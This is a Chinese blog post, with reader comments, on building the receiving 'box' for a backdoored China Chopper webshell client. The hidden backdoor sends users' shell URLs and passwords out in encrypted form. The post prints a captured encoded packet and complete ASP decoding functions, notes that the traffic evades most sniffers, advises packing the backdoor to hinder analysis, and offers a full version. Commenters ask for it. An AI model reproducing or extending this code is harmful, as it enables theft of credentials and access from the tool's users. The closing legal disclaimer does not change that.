如何制作中国菜刀三百万后门箱子

逆向破解 渗透测试 中国菜刀 后门 源码 逆向 破解

相信各位都看过这篇中国菜刀仿冒官网三百万箱子爆菊记,肯定会有人像我一样想过:那么这个菜刀后门箱子该怎么制作呢?所以下面就来介绍介绍了~

首先,这个后门存在于菜刀的db.tmp中,用WinHex载入就能找到
1.png

这个是我修改过后的,用于本地做测试用

我们都知道,通常对软件后门的检测都是通过抓包来检验的,但这个后门却可以绕过多数抓包软件:
2.png

所以要想抓到数据包就要用点非主流的抓包工具~

但是,及时你能成功抓到包,你也会发现数据包是被加密的,没有关键的解密文件根本没有用

3.png

含有shell地址、密码、配置等信息的数据包:

593=%33%33%33%30%33%33%34%35%33%33%33%31%33%33%33%32%33%33%33%31%33%33%33%32%33%33%33%31%33%33%33%36%33%33%33%35%33%34%33%37%33%33%33%34%33%34%33%30%33%33%33%34%33%34%33%30%33%33%33%31%33%33%33%31%33%33%33%31%33%33%33%31%33%33%33%31%33%33%33%31%33%33%33%34%33%34%33%33%33%33%33%30%33%34%33%32%33%33%33%30%33%33%33%37%33%33%33%30%33%33%34%36%33%33%33%30%33%33%33%35%33%33%33%30%33%33%33%37%33%33%33%30%33%33%34%36%33%33%33%30%33%33%33%32%33%33%33%30%33%33%33%37%33%33%33%30%33%34%33%30%33%33%33%34%33%34%33%33%33%33%33%31%33%33%33%32%33%33%33%30%33%34%33%30%33%33%33%31%33%33%33%36%33%33%33%34%33%34%33%30%33%33%33%31%33%33%33%35%33%33%33%30%33%33%33%33%33%33%33%31%33%33%33%34%33%33%33%31%33%33%33%30%33%33%33%30%33%33%33%33%33%33%33%31%33%33%33%34%33%33%33%34%33%34%33%33%33%33%33%31%33%33%33%36%33%33%33%30%33%33%34%35%33%33%33%31%33%33%33%36%33%33%33%31%33%34%33%34%33%33%33%34%33%33%33%37%33%33%33%31%33%33%34%35%33%33%33%34%33%33%33%37%33%33%33%31%33%34%33%32%33%33%33%30%33%33%33%35%33%33%33%30%33%33%33%37%33%33%33%30%33%33%34%36%33%33%33%30%33%33%33%32%33%33%33%30%33%33%33%37%33%33%33%30%33%34%33%30%33%33%33%31%33%34%33%34%33%33%33%34%33%33%33%37%33%33%33%31%33%33%34%35%33%33%33%34%33%33%33%37%33%33%33%31%33%34%33%32%33%33%33%35%33%33%34%36%33%33%33%35%33%33%33%35%33%33%33%35%33%33%33%30%33%33%33%31%33%34%33%34%33%33%33%34%33%33%33%37%33%33%33%31%33%33%34%35%33%33%33%34%33%33%33%37%33%33%33%31%33%34%33%32%33%33%33%35%33%34%33%35%33%33%33%33%33%

所以这个后门箱子的重点就是解密函数了~下面贴出核心的解密函数

Public Function Decode(s)
Dim i, x
for i = 1 to len(s) step 2 '还原url编码
    x = x & "%" & mid(s, i, 2)
next
x = UrlDecode(x) '调用下面的url编码还原函数
Dim y, a
for i = 1 to len(x) step 2 '将每对十六进制字符进行异或运算还原,然后再编码为十六进制
    a = Int("&H" & mid(x, i, 2)) '每对十六进制转换为十进制
    a = a xor 6 '进行异或运算还原
    y = y & chr(a) '还原Ascii码为字符
next
x = ""
for i = 1 to len(y) step 2 '还原url编码
    x = x & "%" & mid(y, i, 2)
next
x = UrlDecode(x) 'url编码还原
Decode = x
End Function

Public Function UrlDecode(S) 'url编码还原函数
Dim I
For I = 1 To Len(S)
    If Mid(S, I, 1) = "%" Then
        If Int("&H" & Mid(S, I + 1, 2)) > 127 Then
            UrlDecode = UrlDecode & Chr(Int("&H" & Mid(S, I + 1, 2) & Mid(S, I + 4, 2)))
            I = I + 5
        Else
            UrlDecode = UrlDecode & Chr(Int("&H" & Mid(S, I + 1, 2)))
            I = I + 2
        End If
    Else
        UrlDecode = UrlDecode & Mid(S, I, 1)
    End If
Next
End Function

这个是ASP版的解密函数,网上某大牛公布出来的~(PS:我可没有那么牛的逆向解密功底囧)

有需要的朋友可以根据以上的源码写出PHP版的,或者可以找我要完整版的~

4.png

可以完美收信~怕后门文件被抓到的,可以加个壳增加破解难度,具体自己测试

最后要提醒一下,本篇文章仅供技术参考与研究!不要以此去做违法事情!本作者不承担由此产生的一切法律责任!毕竟人外有人,天外有天~

再次感谢小亭学长在此期间对我的帮助!

新评论

称呼不能为空
邮箱格式不合法
网站格式不合法
内容不能为空
    KEYONE
    2020-02-05 13:50

    请跟我email联系,payload#aliyun.com

    sss
    2020-01-30 20:53

    你联系方式多少,怎么拿完整版,想研究一下。